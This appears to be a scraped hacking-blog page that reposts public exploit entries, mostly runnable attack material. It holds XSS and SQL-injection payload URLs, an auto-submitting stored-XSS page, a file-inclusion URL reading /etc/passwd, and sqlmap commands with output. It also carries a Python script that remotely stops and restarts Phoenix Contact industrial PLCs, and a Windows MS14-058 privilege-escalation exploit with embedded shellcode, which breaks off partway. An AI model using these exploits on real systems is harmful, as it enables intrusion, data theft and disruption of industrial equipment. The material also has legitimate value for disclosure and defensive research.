source: https://www.securityfocus.com/bid/52986/info
All-in-One Event Calendar plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
All-in-One Event Calendar 1.4 is vulnerable; other prior versions may also be affected.
http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22 %3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863153220
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/52983/info
BGS CMS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker could leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
BGS CMS 2.2.1 is vulnerable; other versions may also be affected.
<html>
<title>BGS CMS v2.2.1 Multiple Stored Cross-Site Scripting Vulnerabilities</title>
<body bgcolor="#000000">
<script type="text/javascript">
function xss0(){document.forms["xss0"].submit();}
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
function xss3(){document.forms["xss3"].submit();}
function xss4(){document.forms["xss4"].submit();}
function xss5(){document.forms["xss5"].submit();}
function xss6(){document.forms["xss6"].submit();}
function xss7(){document.forms["xss7"].submit();}
</script>
<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss0">
<input type="hidden" name="name" value="Zero Science Lab" />
<input type="hidden" name="title" value="XSS" />
<input type="hidden" name="description" value="Cross Site Scripting" />
<input type="hidden" name="parent_id" value="15" />
<input type="hidden" name="redirect" value='"><script>alert(1);</script>' />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="categories" />
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="id" value="29" />
</form>
<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss1">
<input type="hidden" name="title" value="Zero Science Lab" />
<input type="hidden" name="description" value='"><script>alert(1);</script>' />
<input type="hidden" name="disp_on_full_view" value="1" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="level" value="0" />
<input type="hidden" name="type" value="ads" />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="ads" />
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="id" value="0" />
</form>
<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss2">
<input type="hidden" name="created" value="ZSL" />
<input type="hidden" name="name" value='"><script>alert(1);</script>' />
<input type="hidden" name="email" value="test@test.mk" />
<input type="hidden" name="message" value="t00t" />
<input type="hidden" name="status" value="coolio" />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="orders" />
<input type="hidden" name="action" value="edit" />
</form>
<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss3">
<input type="hidden" name="name" value='"><script>alert(1);</script>' />
<input type="hidden" name="question" value="What is physics?" />
<input type="hidden" name="start" value="10 2012" />
<input type="hidden" name="end" value="18 2012" />
<input type="hidden" name="answer_text[]" value="A warm summer evening." />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="polls" />
<input type="hidden" name="action" value="edit" />
</form>
<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss4">
<input type="hidden" name="name" value="admin" />
<input type="hidden" name="image" value="joxy.jpg" />
<input type="hidden" name="url" value='"><script>alert(1);</script>' />
<input type="hidden" name="max_displays" value="1" />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="banners" />
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="id" value="9" />
</form>
<form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss5">
<input type="hidden" name="title" value='"><script>alert(1);</script>' />
<input type="hidden" name="description" value="Ban" />
<input type="hidden" name="folder" value="sexy_banner_imgx" />
<input type="hidden" name="close" value="OK" />
<input type="hidden" name="section" value="gallery" />
<input type="hidden" name="action" value="edit" />
</form>
<form action="http://www.example.com/" method="GET" id="xss6">
<input type="hidden" name="action" value="search" />
<input type="hidden" name="search" value='"><script>alert(1);</script>' />
<input type="hidden" name="x" value="0" />
<input type="hidden" name="y" value="0" />
</form>
<form action="http://www.example.com/cms/" method="GET" id="xss7">
<input type="hidden" name="section" value='"><script>alert(1);</script>' />
<input type="hidden" name="action" value="add_news" />
</form>
<br /><br />
<a href="javascript: xss0();" style="text-decoration:none">
<b><font color="red"><h3>XSS 0</h3></font></b></a><br />
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><h3>XSS 1</h3></font></b></a><br />
<a href="javascript: xss2();" style="text-decoration:none">
<b><font color="red"><h3>XSS 2</h3></font></b></a><br />
<a href="javascript: xss3();" style="text-decoration:none">
<b><font color="red"><h3>XSS 3</h3></font></b></a><br />
<a href="javascript: xss4();" style="text-decoration:none">
<b><font color="red"><h3>XSS 4</h3></font></b></a><br />
<a href="javascript: xss5();" style="text-decoration:none">
<b><font color="red"><h3>XSS 5</h3></font></b></a><br />
<a href="javascript: xss6();" style="text-decoration:none">
<b><font color="red"><h3>XSS 6</h3></font></b></a><br /><br />
<a href="javascript: xss7();" style="text-decoration:none">
<b><font color="red"><h3>XSS 7</h3></font></b></a><br /><br />
</body></html>
source: https://www.securityfocus.com/bid/52946/info
CitrusDB is prone to a local file-include vulnerability and an SQL-injection vulnerability.
An attacker can exploit these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and view and execute arbitrary local files within the context of the webserver.
CitrusDB 2.4.1 is vulnerable; other versions may also be affected.
http://www.example.com/lab/citrus-2.4.1/index.php?load=../../../../../etc/passwd%00&type=base
source: https://www.securityfocus.com/bid/52970/info
Matterdaddy Market is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Matterdaddy Market 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/mdmarket/admin/controller.php?cat_name=1&cat_order=-1%27[SQL INJECTION]&add=Add+Category&op=newCategory
http://www.example.com/mdmarket/admin/controller.php?cat_name=-1%27[SQL INJECTION]&cat_order=1&add=Add+Category&op=newCategory
source: https://www.securityfocus.com/bid/52944/info
Uploadify Integration plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Uploadify Integration 0.9.6 is vulnerable; other prior versions may also be affected.
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?buttontext="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?filetypeexts="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?filetypedesc="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?filesizelimit="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?uploadmode="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?metatype="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?parentid="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?path="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?url="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
partials/file.php?fileid="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
partials/file.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
file/error.php?error="><script>alert(String.fromCharCode(88,83,83))</script>
"""
# Exploit title: ZOC SSH Client v.7.03.0 Buffer overflow vulnerability (SEH)
# Date: 20-5-2015
# Vendor homepage: www.emtec.com
# Software Link: http://www.emtec.com/cgi-local/download.cgi?what=ZOC7%20(Windows)&link=zoc/zoc7030.exe&ext=html
# Author: Dolev Farhi
# Details:
# --------
# Create a new connection, run the py script and copy the AAAA...string from zoc.txt to clipboard. paste it in the
# server address and attempt to connect.
"""
#!/usr/bin/python
filename="zoc.txt"
buffer = "\x41" * 97
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
# Exploit Title: SQLi in FeedWordPress WordPress plugin
# Date: 2015-05-19
# Exploit Author: Adrián M. F.
# Vendor Homepage: https://wordpress.org/plugins/feedwordpress/
# Vulnerable version: 2015.0426
# Fixed version: 2015.0514
# CVE : CVE-2015-4018
(1) Authenticated SQLi [CWE-89]
-------------------------------
* CODE:
feedwordpresssyndicationpage.class.php:89
+++++++++++++++++++++++++++++++++++++++++
$targets = $wpdb->get_results("
SELECT * FROM $wpdb->links
WHERE link_id IN (".implode(",",$_POST['link_ids']).")
");
+++++++++++++++++++++++++++++++++++++++++
http://192.168.167.131/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php
POST DATA: _wpnonce=a909681945&_wp_http_referer=/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&action=Update Checked&link_ids[]=1[SQLi]
* POC:
SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py -u "http://[domain]/wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=Y" --data="_wpnonce=a909681945&_wp_http_referer=/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&action=Update Checked&link_ids[]=1" -p "link_ids[]" --dbms mysql --cookie="[cookie]"
[............]
POST parameter 'link_ids[]' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 62 HTTP(s) requests:
---
Parameter: link_ids[] (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: _wpnonce=a909681945&_wp_http_referer=/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&action=Update Checked&link_ids[]=1) AND (SELECT * FROM (SELECT(SLEEP(5)))eHWc) AND (7794=7794
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: _wpnonce=a909681945&_wp_http_referer=/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&action=Update Checked&link_ids[]=1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b6a71,0x70716153577975544373,0x7178716271)--
---
[10:40:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0.12
+++++++++++++++++++++++++++++++++++++++++
Timeline
========
2015-05-09: Discovered vulnerability.
2015-05-14: Vendor notification.
2015-05-14: Vendor response and fix.
2015-05-19: Public disclosure.
#!/usr/bin/env python
'''
# Exploit Title: Phoenix Contact ILC 150 ETH PLC Remote Control script
# Date: 2015-05-19
# Exploit Author: Photubias - tijl[dot]deneut[at]howest[dot]be
# Vendor Homepage: https://www.phoenixcontact.com/online/portal/us?urile=pxc-oc-itemdetail:pid=2985330
# Version: ALL FW VERSIONS
# Tested on: Python runs on Windows, Linux
# CVE : CVE-2014-9195
Copyright 2015 Photubias(c)
Written for Howest(c) University College
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
File name ControlPLC.py
written by tijl[dot]deneut[at]howest[dot]be
This POC will print out the current status of the PLC, continuously every 0.1 second, after 3 seconds it reverts (start becomes stop, stop becomes cold start), and stops after 5 seconds
Works on ILC 15x ETH, partly on RFC 43x, partly on ILC 39x
'''
import sys, socket, binascii, time, os, select, re
IP=''
infoport=1962
controlport=41100
## Defining Functions First
def send_and_recv(s,size,strdata):
data = binascii.unhexlify(strdata) ## Convert to real HEX (\x00\x00 ...)
s.send(data)
ret = s.recv(4096)
return ret
def doAction(s,strdata):
ret = send_and_recv(s,1000,strdata)
# In official state these are send, they do not seem to be needed
send_and_recv(s,1000,packet1)
send_and_recv(s,1000,packet2)
send_and_recv(s,1000,packet2)
ret = send_and_recv(s,1000,'010002000000020003000100000000000840')
send_and_recv(s,1000,packet2)
return ret
def initMonitor(s):
send_and_recv(s,1000,'0100000000002f00000000000000cfff4164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c536572766963653200')
send_and_recv(s,1000,'0100000000002e0000000000000000004164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c5365727669636500')
send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446174614163636573735365727669636500')
send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e49446576696365496e666f536572766963653200')
send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446576696365496e666f5365727669636500')
send_and_recv(s,1000,'0100000000002500000000000000d9ff4164652e52656d6f74696e672e53657276696365732e49466f726365536572766963653200')
send_and_recv(s,1000,'010000000000240000000000000000004164652e52656d6f74696e672e53657276696365732e49466f7263655365727669636500')
send_and_recv(s,1000,'0100000000003000000000000000ceff4164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653300')
send_and_recv(s,1000,'010000000000300000000000000000004164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653200')
send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e49446576696365496e666f536572766963653200')
send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446576696365496e666f5365727669636500')
send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e4944617461416363657373536572766963653300')
send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446174614163636573735365727669636500')
send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e4944617461416363657373536572766963653200')
send_and_recv(s,1000,'0100000000002900000000000000d5ff4164652e52656d6f74696e672e53657276696365732e49427265616b706f696e745365727669636500')
send_and_recv(s,1000,'0100000000002800000000000000d6ff4164652e52656d6f74696e672e53657276696365732e4943616c6c737461636b5365727669636500')
send_and_recv(s,1000,'010000000000250000000000000000004164652e52656d6f74696e672e53657276696365732e494465627567536572766963653200')
send_and_recv(s,1000,'0100000000002f00000000000000cfff4164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c536572766963653200')
send_and_recv(s,1000,'0100000000002e0000000000000000004164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c5365727669636500')
send_and_recv(s,1000,'0100000000003000000000000000ceff4164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653300')
send_and_recv(s,1000,'010000000000300000000000000000004164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653200')
send_and_recv(s,1000,'0100020000000e0003000300000000000500000012401340130011401200')
return
def is_ipv4(ip):
match = re.match("^(\d{0,3})\.(\d{0,3})\.(\d{0,3})\.(\d{0,3})$", ip)
if not match:
return False
quad = []
for number in match.groups():
quad.append(int(number))
if quad[0] < 1:
return False
for number in quad:
if number > 255 or number < 0:
return False
return True
##### The Actual Program
if not len(sys.argv) == 2:
IP = raw_input("Please enter the IPv4 address of the Phoenix PLC: ")
else:
IP = sys.argv[1]
if not is_ipv4(IP):
print "Please go read RFC 791 and then use a legitimate IPv4 address."
sys.exit()
## - initialization, this will get the PLC type, Firmware version, build date & time
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((IP,infoport))
print 'Initializing PLC'
print '----------------'
code = send_and_recv(s,1000,'0101001a005e000000000003000c494245544830314e305f4d00').encode('hex')[34:36]
send_and_recv(s,1000,'01050016005f000008ef00' + code + '00000022000402950000')
ret = send_and_recv(s,1000,'0106000e00610000881100' + code + '0400')
print 'PLC Type = ' + ret[30:50]
print 'Firmware = ' + ret[66:70]
print 'Build = ' + ret[79:100]
send_and_recv(s,1000,'0105002e00630000000000' + code + '00000023001c02b0000c0000055b4433325d0b466c617368436865636b3101310000')
send_and_recv(s,1000,'0106000e0065ffffff0f00' + code + '0400')
send_and_recv(s,1000,'010500160067000008ef00' + code + '00000024000402950000')
send_and_recv(s,1000,'0106000e0069ffffff0f00' + code + '0400')
send_and_recv(s,1000,'0102000c006bffffff0f00' + code)
s.shutdown(socket.SHUT_RDWR)
s.close()
print 'Initialization done'
print '-------------------\r\n'
print 'Will now print the PLC state and reverse it after 3 seconds'
raw_input('Press [Enter] to continue')
########## CONTROL PHASE ####### Start monitoring with loop on port 41100
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((IP,controlport))
# First init phase (sending things like 'Ade.Remoting.Services.IProConOSControlService2' and 'Ade.Remoting.Services.ISimpleFileAccessService3', 21 packets)
initMonitor(s)
# Query packet
packet1 = '010002000000080003000300000000000200000002400b40'
# Keepalive packet
packet2 = '0100020000001c0003000300000000000c00000007000500060008001000020011000e000f000d0016401600'
## The loop keepalive and query status loop (2 x keepalive, one time query):
i = 0
state = 'On'
running = 0
stopme = 0
startme = 0
while True:
i += 1
time.sleep(0.1)
## Keep Alive
send_and_recv(s,1000,packet2)
send_and_recv(s,1000,packet2)
## Possible actions (like stop/start) should be sent now before the query state
if (state == 'Running' and stopme):
print 'Sending Stop'
doAction(s,'01000200000000000100070000000000')
startme = stopme = 0
elif (state == 'Stop' and startme):
print 'Sending COLD Start'
## This is the COLD start: doAction(s,'010002000000020001000600000000000100')
## This is the WARM start: doAction(s,'010002000000020001000600000000000200')
## This is the HOT start: doAction(s,'010002000000020001000600000000000300')
doAction(s,'010002000000020001000600000000000100')
startme = stopme = 0
## Query Status
ret = send_and_recv(s,1000,packet1).encode('hex')
if ret[48:50] == '03':
state = 'Running'
elif ret[48:50] == '07':
state = 'Stop'
elif ret[48:50] == '00':
state = 'On'
else:
print 'State unknown, found code: '+ret.encode('hex')[48:50]
print 'Current PLC state: '+state
## Maintaining the LOOP
if i == 50:
break
# '''
if i == 30:
if state == 'Running':
stopme = 1
else:
startme = 1
#'''
raw_input('All done, press [Enter] to exit')
Comodo GeekBuddy Local Privilege Escalation (CVE-2014-7872)
Jeremy Brown [jbrown3264/gmail]
-Synopsis-
Comodo GeekBuddy, which is bundled with Comodo Anti-Virus, Comodo Firewall
and Comodo Internet Security, runs a passwordless, background VNC server
and listens for incoming connections. This can allow for at least local
privilege escalation on several platforms. It also may be remotely
exploitable via CSRF-like attacks utilizing a modified web-based VNC client
(eg. a Java VNC client).
-Repro-
1) Install GeekBuddy (either standalone or bundled with the aforementioned
packages)
2) Administrator (or other user) logs into the system so the VNC server
will be started
3) Start another login to the system (eg. target OS is Windows Server)
4) Connect to the VNC server on localhost to assume the Admin session
-Fix-
Comodo says they have fix this vulnerability with the v4.18.121 release in
October 2014
-References-
https://technet.microsoft.com/en-US/dn613815
http://archive.hack.lu/2014/Microsoft%20Vulnerability%20Research%20-%20How%20to%20be%20a%20Finder%20as%20a%20Vendor.pdf
# Windows 8.0 - 8.1 x64 TrackPopupMenu Privilege Escalation (MS14-058)
# CVE-2014-4113 Privilege Escalation
# http://www.offensive-security.com
# Thx to Moritz Jodeit for the beautiful writeup
# http://www.exploit-db.com/docs/35152.pdf
# Target OS Windows 8.0 - 8.1 x64
# Author: Matteo Memelli ryujin <at> offensive-security.com
# EDB Note: Swapping the shellcode for a bind or reverse shell will BSOD the machine.
from ctypes import *
from ctypes.wintypes import *
import struct, sys, os, time, threading, signal
ULONG_PTR = PVOID = LPVOID
HCURSOR = HICON
PDWORD = POINTER(DWORD)
PQWORD = POINTER(LPVOID)
LRESULT = LPVOID
UCHAR = c_ubyte
QWORD = c_ulonglong
CHAR = c_char
NTSTATUS = DWORD
MIIM_STRING = 0x00000040
MIIM_SUBMENU = 0x00000004
WH_CALLWNDPROC = 0x4
GWLP_WNDPROC = -0x4
NULL = 0x0
SystemExtendedHandleInformation = 64
ObjectDataInformation = 2
STATUS_INFO_LENGTH_MISMATCH = 0xC0000004
STATUS_BUFFER_OVERFLOW = 0x80000005L
STATUS_INVALID_HANDLE = 0xC0000008L
STATUS_BUFFER_TOO_SMALL = 0xC0000023L
STATUS_SUCCESS = 0
TOKEN_ALL_ACCESS = 0xf00ff
DISABLE_MAX_PRIVILEGE = 0x1
FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000
PAGE_EXECUTE_READWRITE = 0x00000040
PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF )
VIRTUAL_MEM = ( 0x1000 | 0x2000 )
TH32CS_SNAPPROCESS = 0x02
WinFunc1 = WINFUNCTYPE(LPVOID, INT, WPARAM, LPARAM)
WinFunc2 = WINFUNCTYPE(HWND, LPVOID, INT, WPARAM, LPARAM)
WNDPROC = WINFUNCTYPE(LPVOID, HWND, UINT, WPARAM, LPARAM)
bWndProcFlag = False
bHookCallbackFlag = False
EXPLOITED = False
Hmenu01 = Hmenu02 = None
# /*
# * windows/x64/exec - 275 bytes
# * http://www.metasploit.com
# * VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,
# * CMD=cmd.exe
# */
SHELLCODE = (
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64"
"\x2e\x65\x78\x65\x00")
class LSA_UNICODE_STRING(Structure):
"""Represent the LSA_UNICODE_STRING on ntdll."""
_fields_ = [
("Length", USHORT),
("MaximumLength", USHORT),
("Buffer", LPWSTR),
]
class SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure):
"""Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll."""
_fields_ = [
("Object", PVOID),
("UniqueProcessId", PVOID),
("HandleValue", PVOID),
("GrantedAccess", ULONG),
("CreatorBackTraceIndex", USHORT),
("ObjectTypeIndex", USHORT),
("HandleAttributes", ULONG),
("Reserved", ULONG),
]
class SYSTEM_HANDLE_INFORMATION_EX(Structure):
"""Represent the SYSTEM_HANDLE_INFORMATION on ntdll."""
_fields_ = [
("NumberOfHandles", PVOID),
("Reserved", PVOID),
("Handles", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1),
]
class PUBLIC_OBJECT_TYPE_INFORMATION(Structure):
"""Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll."""
_fields_ = [
("Name", LSA_UNICODE_STRING),
("Reserved", ULONG * 22),
]
class MENUITEMINFO(Structure):
"""Contains information about a menu item."""
_fields_ = [
("cbSize" , UINT),
("fMask" , UINT),
("fType" , UINT),
("fState" , UINT),
("wID" , UINT),
("hSubMenu" , HMENU),
("hbmpChecked" , HBITMAP),
("hbmpUnchecked", HBITMAP),
("dwItemData" , ULONG_PTR),
("dwTypeData" , LPWSTR),
("cch" , UINT),
("hbmpItem" , HBITMAP),
]
class WNDCLASS(Structure):
"""Contains the window class attributes that are registered by the
RegisterClass function."""
_fields_ = [
("style" , UINT),
("lpfnWndProc" , WNDPROC),
("cbClsExtra" , INT),
("cbWndExtra" , INT),
("hInstance" , HINSTANCE),
("hIcon" , HCURSOR),
("hCursor" , HBITMAP),
("hbrBackground", HBRUSH),
("lpszMenuName" , LPWSTR),
("lpszClassName", LPWSTR),
]
class PROCESSENTRY32(Structure):
"""Describes an entry from a list of the processes residing in the system
address space when a snapshot was taken."""
_fields_ = [ ( 'dwSize' , DWORD ) ,
( 'cntUsage' , DWORD) ,
( 'th32ProcessID' , DWORD) ,
( 'th32DefaultHeapID' , POINTER(ULONG)) ,
( 'th32ModuleID' , DWORD) ,
( 'cntThreads' , DWORD) ,
( 'th32ParentProcessID' , DWORD) ,
( 'pcPriClassBase' , LONG) ,
( 'dwFlags' , DWORD) ,
( 'szExeFile' , CHAR * MAX_PATH )
]
user32 = windll.user32
kernel32 = windll.kernel32
ntdll = windll.ntdll
advapi32 = windll.advapi32
user32.PostMessageW.argtypes = [HWND, UINT, WPARAM, LPARAM]
user32.PostMessageW.restype = BOOL
user32.DefWindowProcW.argtypes = [HWND, UINT, WPARAM, LPARAM]
user32.DefWindowProcW.restype = LRESULT
user32.UnhookWindowsHook.argtypes = [DWORD, WinFunc1]
user32.UnhookWindowsHook.restype = BOOL
user32.SetWindowLongPtrW.argtypes = [HWND, DWORD, WinFunc2]
user32.SetWindowLongPtrW.restype = LPVOID
user32.CallNextHookEx.argtypes = [DWORD, DWORD, WPARAM, LPARAM]
user32.CallNextHookEx.restype = LRESULT
user32.RegisterClassW.argtypes = [LPVOID]
user32.RegisterClassW.restype = BOOL
user32.CreateWindowExW.argtypes = [DWORD, LPWSTR, LPWSTR, DWORD,
INT, INT, INT, INT, HWND, HMENU,
HINSTANCE, LPVOID]
user32.CreateWindowExW.restype = HWND
user32.InsertMenuItemW.argtypes = [HMENU, UINT, BOOL, LPVOID]
user32.InsertMenuItemW.restype = BOOL
user32.DestroyMenu.argtypes = [HMENU]
user32.DestroyMenu.restype = BOOL
user32.SetWindowsHookExW.argtypes = [DWORD, WinFunc1, DWORD, DWORD]
user32.SetWindowsHookExW.restype = BOOL
user32.TrackPopupMenu.argtypes = [HMENU, UINT, INT, INT, INT, HWND,
DWORD]
user32.TrackPopupMenu.restype = BOOL
advapi32.OpenProcessToken.argtypes = [HANDLE, DWORD , POINTER(HANDLE)]
advapi32.OpenProcessToken.restype = BOOL
advapi32.CreateRestrictedToken.argtypes = [HANDLE, DWORD, DWORD, DWORD,
DWORD, DWORD, DWORD, DWORD,
POINTER(HANDLE)]
advapi32.CreateRestrictedToken.restype = BOOL
advapi32.AdjustTokenPrivileges.argtypes = [HANDLE, BOOL, DWORD, DWORD,
DWORD, DWORD]
advapi32.AdjustTokenPrivileges.restype = BOOL
advapi32.ImpersonateLoggedOnUser.argtypes = [HANDLE]
advapi32.ImpersonateLoggedOnUser.restype = BOOL
kernel32.GetCurrentProcess.restype = HANDLE
kernel32.WriteProcessMemory.argtypes = [HANDLE, QWORD, LPCSTR, DWORD,
POINTER(LPVOID)]
kernel32.WriteProcessMemory.restype = BOOL
kernel32.OpenProcess.argtypes = [DWORD, BOOL, DWORD]
kernel32.OpenProcess.restype = HANDLE
